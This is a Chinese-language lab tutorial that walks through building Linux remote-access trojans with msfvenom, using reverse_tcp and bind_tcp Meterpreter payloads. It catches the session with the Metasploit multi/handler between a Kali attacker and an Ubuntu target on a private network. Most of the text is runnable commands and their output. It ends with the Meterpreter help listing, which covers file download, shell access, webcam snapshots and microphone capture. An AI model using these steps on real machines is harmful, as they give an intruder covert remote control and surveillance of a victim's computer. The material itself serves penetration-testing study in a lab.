環境
攻擊機:Kali Linux 2020.1 172.16.252.129
靶機:Ubuntu 16.04 172.16.252.138
生成反向連接木馬
使用kali自帶的Msfvenom工具生成木馬。
查看有哪些linux下的載荷:
msfvenom -l payloads | grep linux
針對Ubuntu 64位靶機,使用linux/x64/meterpreter/reverse_tcp載荷,並指定反彈連接的IP和端口,生成elf類型的木馬:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf
打印以下信息:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
在當前目錄已經生成了shell.elf文件。
打開監聽
接下來運行msfconsole:
msfconsole
輸入以下指令,指定監聽攻擊模塊,載荷,IP,端口:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 172.16.252.129
set lport 1234
exploit
最後一行exploit可以換成run。
運行木馬
修改之前生成的shell.elf屬性爲可執行:
chmod a+x shell.elf
將其拷貝到靶機Ubuntu 16.04中運行:
./shell.elf
這時kali端打印出:
[*] Started reverse TCP handler on 172.16.252.129:1234
[*] Sending stage (3021284 bytes) to 172.16.252.138
[*] Meterpreter session 2 opened (172.16.252.129:1234 -> 172.16.252.138:56384) at 2020-04-20 07:04:26 -0400
正向連接木馬
類似上面的反向連接木馬,可以使用bind_tcp載荷,開啓正向連接木馬。和反向連接的區別在於:
反向連接木馬是攻擊機開放端口,靶機連過來;
正向連接木馬是靶機開放端口,攻擊機連過去;
生成木馬:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf > bindtcp.elf
放到靶機上運行:
./bindtcp.elf
攻擊機開啓連接:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 172.16.252.138
set lport 4444
run
成功建立連接:
meterpreter指令
meterpreter可用命令如下(不知道爲啥沒有screenshot了):
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Mic Commands
====================
Command Description
------- -----------
listen listen to a saved audio recording via audio player
mic_list list all microphone interfaces
mic_start start capturing an audio stream from the target mic
mic_stop stop capturing audio
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system, nothing written on disk
比如現在執行:
ls
已經能看到對方主機目錄。